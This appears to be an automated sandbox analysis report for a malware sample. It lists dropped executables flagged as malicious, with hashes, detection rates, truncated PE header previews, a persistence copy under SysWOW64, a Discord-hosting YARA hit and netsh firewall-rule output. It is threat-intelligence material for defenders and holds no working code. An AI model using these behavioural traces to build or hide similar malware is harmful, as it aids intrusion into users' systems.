SHA-512: 86F3946B813FB457D95B6635FA308DA1BF5F2C0FBD5BDCA75F7776D1A01A2D3C67A8A9E268DCC145FF575D70FBE84BE9BEB112A0D2269B955795C74468C00598
Malicious: true
Antivirus:
• Avira, Detection: 100%
Reputation: unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d...Q..a.........."......6...T................@......................................p...`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\1523.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3576320
Entropy (8bit): 7.9976863291960605
Encrypted: true
SSDEEP: 49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
MD5: 5800952B83AECEFC3AA06CCB5B29A4C2
SHA1: DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
SHA-256: B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
SHA-512: 2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
Malicious: true
Antivirus:
• Joe Sandbox ML, Detection: 100%
Reputation: unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\2205.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 905216
Entropy (8bit): 7.399713113456654
Encrypted: false
SSDEEP: 12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
MD5: 852D86F5BC34BF4AF7FA89C60569DF13
SHA1: C961CCD088A7D928613B6DF900814789694BE0AE
SHA-256: 2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
SHA-512: B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
Malicious: true
Antivirus:
• Joe Sandbox ML, Detection: 100%
• Metadefender, Detection: 34%
• ReversingLabs, Detection: 77%
Reputation: unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\2D8F.exe
Process: C:\Windows\explorer.exe
File Type: MS-DOS executable
Category: dropped
Size (bytes): 557664
Entropy (8bit): 7.687250283474463
Encrypted: false
SSDEEP: 12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
MD5: 6ADB5470086099B9169109333FADAB86
SHA1: 87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
SHA-256: B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
SHA-512: D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
Malicious: true
Antivirus:
• Joe Sandbox ML, Detection: 100%
• ReversingLabs, Detection: 50%
Reputation: unknown
                                                                                                                        Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                                                        C:\Users\user\AppData\Local\Temp\4955.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):7336385
                                                                                                                        Entropy (8bit):7.993036026488077
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:196608:l++hvICteEroXxqENE+sKsXXgvkwuUxNhMC/CKN7kL:BInEroXjsKkXgs/EhWKNY
                                                                                                                        MD5:AE6510D9815C44A818F722ECAE6844B8
                                                                                                                        SHA1:2A34B5110F5C3C2424AE9685F57261E2546BD963
                                                                                                                        SHA-256:C3CAD582268B165711E2F2B1834891C7BCB5E57A7EFB1E709E3DF19D011AD656
                                                                                                                        SHA-512:8CAA9E661403D5D86F69E7C35E45CDF927EF9EC0C6045ED2CA5AF2EAAF26B4F99291EADAF2F0C8C00A31B05B228C6DF0C4BD205A7B3EC70E263313A08FFEF4F8
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d.....a.........."......6...T................@....................................%.p...`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\54D0.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3596288
                                                                                                                        Entropy (8bit):7.997492170986202
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:49152:x+8QEA1GN2zhieKqcTe0f3nWNHiZWf5dxQNPY7wUE9E8gnH43lvn/3juAVUk3Imp:xZ3KKqcTMNIWBnYAlRo7uOUk3ll4UMS
                                                                                                                        MD5:8897C1354CB525DE5F4DE514D6FE836D
                                                                                                                        SHA1:2F92D4CCA4D7576603A442BBACB87450F41CFE6E
                                                                                                                        SHA-256:407C68405D373D2C8EF66B004B293BE25D571348E8922D02D7B79EB20A5138DB
                                                                                                                        SHA-512:A46C6F7BAF298C34607701353E136120153521326A77C787F62F8BF439BB7DEC188A757271B4C8E47E650E86272159FD5D072A1530195D60900FEB8C481F671D
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S.......6.....................................|.N. ....0M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........?....P......................@.............1..p......................@....rsrc........0M.......0.............@....2pZFPAB......N......02.............@....adata........S.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\5BBC.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):301056
                                                                                                                        Entropy (8bit):5.192330972647351
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                                        MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                                        SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                                        SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                                        SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 46%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\6471.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3590144
                                                                                                                        Entropy (8bit):7.997643531968
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:49152:3+N1VszZfKeEM30gwJHRUy0hsgpJx7SbEmW/DNYwtinYQYwDvvEipRiGqmkNajh1:381EKrHVRA2A/+NWxYZYYDvvNji7o
                                                                                                                        MD5:DA5C869D0ADE431230679390B5D183BF
                                                                                                                        SHA1:A0A3EC54CDC7762F78BF1DD2C5594F9A6AF2CBC3
                                                                                                                        SHA-256:98CE1395284401CDB5EBF5BDBCB02DDE9C404BEB668B7FF985794AE0408A5805
                                                                                                                        SHA-512:47EA2FF52B50F1E4CB27957451D6C50F2D90B861A4BAF9A96718749368D76491CF9B1D39AA23E059A2A589DC48BD1EF0C529AE201EAD635806CA89A276C82087
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@..........................pS.....#87.....................................|.N. .....M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@................P......................@.............1..`......................@....rsrc.........M.......0.............@....kujN2o2......N.......2.............@....adata.......`S.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\6B9B.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):322048
                                                                                                                        Entropy (8bit):6.699290650106884
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:MQ2h5D3tUU9l9zaP2kuPC7dIvnxcDzQMCXfEXu:MQsJpzRtq7GvxcYMC8
                                                                                                                        MD5:039CCF44EF7B55AEB4D22D211D17774E
                                                                                                                        SHA1:5C6E0E0F14F56F8F9C1D990474D9799C595572C1
                                                                                                                        SHA-256:9EE489B4B2FEC770F57CCC6D2EAB9CE29678E3D4CA8A9D6467634B76C30B850A
                                                                                                                        SHA-512:881CA9044920D2C108E3719000C9D881B58BBC5294B96E910B89B27D103D0C56B9F0DCD846FCE0F5160CDD02BF30E3A04DD31D6AE7E3DCDA87B73F3E46540F7A
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L....4.`.........................................@.............................................................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....tuv................................@....bezax..............................@....lelepar............................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\6BA5.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):324608
                                                                                                                        Entropy (8bit):6.709124384088194
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:lx+/UbfEz9xL/a5EQlXyBhQ3hTTJhYjVcsT:lxsUbczr/NKCB+hTTYjuQ
                                                                                                                        MD5:7E58C9178CBD9D56DB805F034EC795CB
                                                                                                                        SHA1:4859C89EED51EAEDAC1BAFBD52BFB5E9382BFDC3
                                                                                                                        SHA-256:2798CE7846DE002A01D784C809499EB20BF108F2D93119AAD082098AC0CB03CC
                                                                                                                        SHA-512:8D4A8C162332095BF5AD4CB1A712D0C0389FCCD91758450A2ABAF79A238977F61A653EE3FD44AF3571D6A6588763C0AAC331474F64571CE7D5FD99614D4C238A
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L....p._..........................................@.................................id..........................................P.......(...............................................................@...............L............................text...~........................... ..`.data...............................@....geravic............................@....pude...............................@....vup................................@....rsrc...(............$..............@..@.reloc..dF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\6E36.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):20480
                                                                                                                        Entropy (8bit):5.021094695416705
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:1P27QR0ir3uqVQ1Tf+1rkZlgEdLcHIH+2f9sFIILCbj4KQWylH28iYfx:1PYQR0i4krj58LIL0zy2
                                                                                                                        MD5:9DA91D9E3AD909FB8EBA4D3D74344982
                                                                                                                        SHA1:D5B6872D062043478CBA1002A815A013952D3837
                                                                                                                        SHA-256:0417281135837E3CCC11F35B2D17A6A3672B011E85C18884F54F6FEABA7B8069
                                                                                                                        SHA-512:29D672F0BB8AEE885F008F7B7EBED499E7C5D8738B9373BF169896BE85C271FAAB5BD9792C176C7CDCB1C39606F07041E1E54E8F893D1D91F49509DF927AA8A0
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\6E36.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!................0..J..........rh... ........@.. ...............................1....@................................. h..O...................................Tg..8............................................ ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............N..............@..B................Th......H........C..."...........e..p...........................................^..}.....(.......(.....*..*..0...............(...%.-...(.....s......s....... ....o...... ....o.....(....r...po......... ....s..........o.....[o....o.........o ....[o....o!......o"......o#....s$............io%......o&.........,...o'......o(........,..o'.........,..o'........+...*..(................"......................0............o).....(*.....s+....+..*...0...........s,.... ....(-.....(........r%..po/.
                                                                                                                        C:\Users\user\AppData\Local\Temp\74DE.exe
                                                                                                                        Process:C:\Windows\explorer.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1332224
Entropy (8bit):6.299565191919942
Encrypted:false
SSDEEP:24576:ynJUxJwfdmVnIMJftatB5BgaOfvSpNMtbJTJlF6+L3bMObTCRqCeC1O441JD7cTM:yJMP7av7b9Gf40UCL
MD5:E6776A105FE3B67E63EC9DCDF4AFCB63
SHA1:DDBA6C56361F4C4556FD3FABFCECC40DA59F71A8
SHA-256:511130568349F9ADAFB26B5CB2614E5E3BF46CA807F0F650F3413F916EE0D32B
SHA-512:A8DB24C28D3C7637CD3E3DFBCF1152E66798EF0AE53D7E919820AB754D1681B5371D6C3C2A8D3CD32CB34D6AB8F1F94F20FB1B9577861D13CF9ECCE06E9FEEA6
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
C:\Users\user\AppData\Local\Temp\77CC.exe
Process:C:\Windows\explorer.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):321024
Entropy (8bit):6.6866910329414475
Encrypted:false
SSDEEP:6144:pNL0PSBctyx4QHvdwUQGanoDqGY8oQ/0ADAhNS6m:pNAPSlX0GrWD870AMNS
MD5:D8DF1D21042865E2220B0D688BAE6DC4
SHA1:ADD58C361D687FEB8A6E44CC0992342F6F426B57
SHA-256:C17E700DE39B64348D46DA0AC5F69F8279479289A9626BEB63C5ABDB7BCEF1F2
SHA-512:42B2BF7381BD0AD57002BB0AF51A2C7B9436D4E4090063CC9EFDF864EEB374B65C9424EBCB7489F4536AF5467A77DAEB73308C4679AC82BC8111BEA472E8E68F
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
C:\Users\user\AppData\Local\Temp\8058.exe
Process:C:\Windows\explorer.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:modified
Size (bytes):537088
Entropy (8bit):5.840438491186833
Encrypted:false
SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
MD5:D7DF01D8158BFADDC8BA48390E52F355
SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
C:\Users\user\AppData\Local\Temp\D9EC.exe
Process:C:\Windows\explorer.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):905216
Entropy (8bit):7.399713113456654
Encrypted:false
SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
MD5:852D86F5BC34BF4AF7FA89C60569DF13
SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
C:\Users\user\AppData\Local\Temp\evjgtzc.exe
Process:C:\Users\user\AppData\Local\Temp\77CC.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):14218752
Entropy (8bit):3.786406643567547
Encrypted:false
SSDEEP:6144:NNL0PSBctyx4QHvdwUQGanoDqGY8oQ/0ADAhNS6m:NNAPSlX0GrWD870AMNS
MD5:BBB91EAF2FB4CC1AA911FF4D555EC36D
SHA1:98DC3BAF9081291CDF915D67B9D654117465A279
SHA-256:EFA995DDEA80E0C9D2DD1A6D6E1BA5319D76984153D72A5FFDEFBC141C863B2B
SHA-512:B5403EB01038BC6801BDB7AF565DCBD9F78EA91DD6BDD17A2EFDE18AF0B33F450A19C2A635D8F57DAF89BA182343DD556E24E978D6FF0B1A99BFB74EB2480A31
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
C:\Users\user\AppData\Roaming\ttfssdi
Process:C:\Windows\explorer.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):321536
Entropy (8bit):6.696489645572037
Encrypted:false
SSDEEP:6144:AJfyOCHHmx9MGofauzMYFm6ggAc3DJbkLGrl6:A9onmx4ffPw6kc3FkLm
MD5:6F48E0E76C5DFB3FC3AA45311FA6D0EF
SHA1:981A29377351493CE6BCE4D3AEDEEC9034DEE056
SHA-256:277AC2C203E37DCF3B71748E7DE0610BA4BF87DDBB7A19CBE7E6BE4CCE5ED175
SHA-512:394F5C1E1E83EEA7A838270EDD90AE644B4A4F8F0009AC9F382400EA10960F04A4DF4EC8E10CD75ABA7FD9F3424C951BDC6015742899EC77AC666C05F09692D4
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
C:\Users\user\AppData\Roaming\ttfssdi:Zone.Identifier
Process:C:\Windows\explorer.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Reputation:unknown
Preview: [ZoneTransfer]....ZoneId=0
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Process:C:\Windows\System32\svchost.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Reputation:unknown
Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220115_030846_681.etl
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):8192
Entropy (8bit):3.3141361646616425
Encrypted:false
SSDEEP:96:BtCKIoCT2o+5K5+u9L/YAFC6SI2lfvkHM4QOT2zjFzoxNMCbdJRW:BELI6Tw02RtwQC3w
MD5:927B70246B82E8AD324C06020435451F
SHA1:41DAC7278D27522B4316A24AE60C2E78190018D1
SHA-256:D6329A8ED63E4E96A0D31CE00D13086835E2A4621699A93F5A4F81C6C7A1D480
SHA-512:55C145816A8F4E92E3C79E30F6BC7A6D6BEABC1305F9B07B079586F2EF1E96CC7F026CD8E0FF48F27A9C410E9FE4DCDE7786AE20DC4AD46F38E6DBC789F1D322
Malicious:false
Reputation:unknown
C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe (copy)
Process:C:\Windows\SysWOW64\cmd.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):14218752
Entropy (8bit):3.786406643567547
Encrypted:false
SSDEEP:6144:NNL0PSBctyx4QHvdwUQGanoDqGY8oQ/0ADAhNS6m:NNAPSlX0GrWD870AMNS
MD5:BBB91EAF2FB4CC1AA911FF4D555EC36D
SHA1:98DC3BAF9081291CDF915D67B9D654117465A279
SHA-256:EFA995DDEA80E0C9D2DD1A6D6E1BA5319D76984153D72A5FFDEFBC141C863B2B
SHA-512:B5403EB01038BC6801BDB7AF565DCBD9F78EA91DD6BDD17A2EFDE18AF0B33F450A19C2A635D8F57DAF89BA182343DD556E24E978D6FF0B1A99BFB74EB2480A31
Malicious:true
Reputation:unknown
C:\Windows\appcompat\Programs\Amcache.hve
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1572864
Entropy (8bit):4.265179812909518
Encrypted:false
SSDEEP:12288:Ax+BOdPDqHjKi7fAOti2ulQ1Aap48xZk8tj8v7W8TKogE410qbDhDkbx:C+BOdPDqHjKi7fA0Egwx
MD5:6AACC767C385FCA2EE1130CB536A2E41
SHA1:6E32F8C0D1C95973831D0579FA644632A2C05DDB
SHA-256:AC3162E77CDB85ABB007BB8EF33CC578204C157F406EE022299668116FEE247A
SHA-512:F589967137ADE4ADA5E51ABA689EE22101ACCF9217DA2EBB7E83230BC88DCCDE15835A2C6570442CF7B44D60B5794AE2B5AEE976E1BCD6425FD7E029A810F5A0
Malicious:false
Reputation:unknown
Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmf..K............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Windows\appcompat\Programs\Amcache.hve.LOG1
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):24576
Entropy (8bit):3.7831703751847625
Encrypted:false
SSDEEP:384:/stDR5tZrdbdXp5/Qp8NXQnxOf2ofPmxwp+5GjZmGCIDTTVi5N5WeqESODe:UtXrjXpupLgf2oWxwpiWmGCWTVGN5nSO
MD5:379E1E75362BB6743CCED68E1B4ACF52
SHA1:D108BCB832E6863B71BEA1B7F6CBD98CD75BF935
SHA-256:0B7EFBF7B662B46C164CD8D018BE3E2D8DC23BC07B4F98EBC5237B93BEF24511
SHA-512:530F87B8BC13EC0FE7D96B677B6BDF405AC3FEE7A83C6A7AA646EA5A6D0B5905AFE63E139D26042A03A3D55DD17BB9C14740077D243A8A4A742533E9CB25EED4
Malicious:false
Reputation:unknown
Preview: regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmf..K....................................................................................................................................................................................................................................................................................................................................................HvLE.^......P..............k......t&*............................... ..hbin................p.\..,..........nk,....K.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....K........ ...........P............... .......Z.......................Root........lf......Root....nk ....K.....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
\Device\ConDrv
Process:C:\Windows\SysWOW64\netsh.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):3773
Entropy (8bit):4.7109073551842435
Encrypted:false
SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
MD5:DA3247A302D70819F10BCEEBAF400503
SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
Malicious:false
Reputation:unknown
Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

Static File Info

General

